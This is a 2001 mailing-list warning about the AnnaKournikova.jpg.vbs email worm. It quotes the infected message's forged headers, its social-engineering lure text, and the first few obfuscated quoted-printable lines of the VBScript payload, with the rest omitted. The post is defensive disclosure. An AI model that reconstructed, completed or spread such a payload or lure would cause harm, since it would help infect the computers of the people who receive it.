Anyone using a PC to read this e'mail should run an anti-virus scan asap using current definitions. A copy of a new vbs MIME virus (AnnaKournikova.jpg.vbs) was posted to the firewalls mailing list from what seems to be a system on a private network at the address 192.168.254.198, apparently using 24-216-123-82.hsacorp.net [24.216.123.82] as an SMTP server, which may or may not have a mail account defined for Gary Rollie <[EMAIL PROTECTED]> (mail headers are so easy to forge, after all). A brief description of the virus is at http://www.sophos.com/virusinfo/analyses/vbsssta.html The message headers are quoted below. Selden ====== Selden E. Ball, Jr. Cornell University Voice: +1-607-255-0688 Laboratory of Nuclear Studies FAX: +1-607-255-8062 230A Wilson Synchrotron Lab http://www.lns.cornell.edu/~seb/ Judd Falls & Dryden Road Internet: [EMAIL PROTECTED] Ithaca, NY, USA 14853-8001 HEPnet/SPAN: LNS62::SEB = 44284::SEB ========================== > Return-path: <[EMAIL PROTECTED]> > Disposition-notification-to: [EMAIL PROTECTED] > Received: from spike.rwc.gnac.net (spike.rwc.gnac.net [209.182.195.137]) > by LNS61.LNS.CORNELL.EDU (PMDF V6.0-24 #41791) > with SMTP id <[EMAIL PROTECTED]> for > [EMAIL PROTECTED] (ORCPT [EMAIL PROTECTED]); Mon, > 12 Feb 2001 14:53:17 -0500 (EST) > Received: (qmail 13894 invoked by uid 15); Mon, 12 Feb 2001 18:26:52 +0000 > Received: from decalpha2.iwarrior.com > (24-216-123-82.hsacorp.net [24.216.123.82]) > by spike.rwc.gnac.net (8.8.8/8.8.8) with ESMTP id KAA13498 for > <[EMAIL PROTECTED]>; Mon, 12 Feb 2001 10:26:34 -0800 (PST) > Received: from [192.168.254.198] by decalpha2.iwarrior.com > (NTMail 5.05.0002/NU4254.00.4b74499a) with ESMTP id usdaaaaa for > [EMAIL PROTECTED]; Mon, 12 Feb 2001 02:05:00 -0500 > Date: Mon, 12 Feb 2001 13:26:08 -0500 > From: Gary Rollie <[EMAIL PROTECTED]> > Subject: Here you have, ;o) > Sender: [EMAIL PROTECTED] > To: "Firewalls@Lists. GNAC. NET" <[EMAIL PROTECTED]> > Message-id: <015b01c09521$44ba66e0$[EMAIL PROTECTED]> > MIME-version: 1.0 > X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 > X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) > Content-type: multipart/mixed; boundary="Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg)" > Importance: Normal > X-Priority: 3 (Normal) > X-MSMail-priority: Normal > Precedence: bulk > X-Loop: [EMAIL PROTECTED] > Delivered-to: [EMAIL PROTECTED] > Original-recipient: rfc822;[EMAIL PROTECTED] > > > --Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg) > Content-type: text/plain; charset="iso-8859-1" > > > Hi: > > Check This! > > --Boundary_(ID_Cs+2iD9YB/4yhEF3SIGRdg) > Content-type: application/octet-stream; name="AnnaKournikova.jpg.vbs" > Content-transfer-encoding: quoted-printable > Content-disposition: attachment; filename="AnnaKournikova.jpg.vbs" > > 'Vbs.OnTheFly Created By OnTheFly=0D=0AExecute e7iqom5JE4z("X)udQ0Vpg= > jnH=11{tEcggv=11f{DQ=11VpgjnH=10{Q=0F=11ptGqt=11tgTwugoP=11zg=10vU= > =0FvgG=11Q9v58Jr7R6?=11E=11gtvcQgldeg*vY$eUktvrU0gjnn+$=0F=109G5QJv78= [remainder of virus omitted] --Boundary_(ID_N8mHCtwVHxo6esU5Ohv/Zw)-- - [To unsubscribe, send mail to [EMAIL PROTECTED] with "unsubscribe firewalls" in the body of the message.]
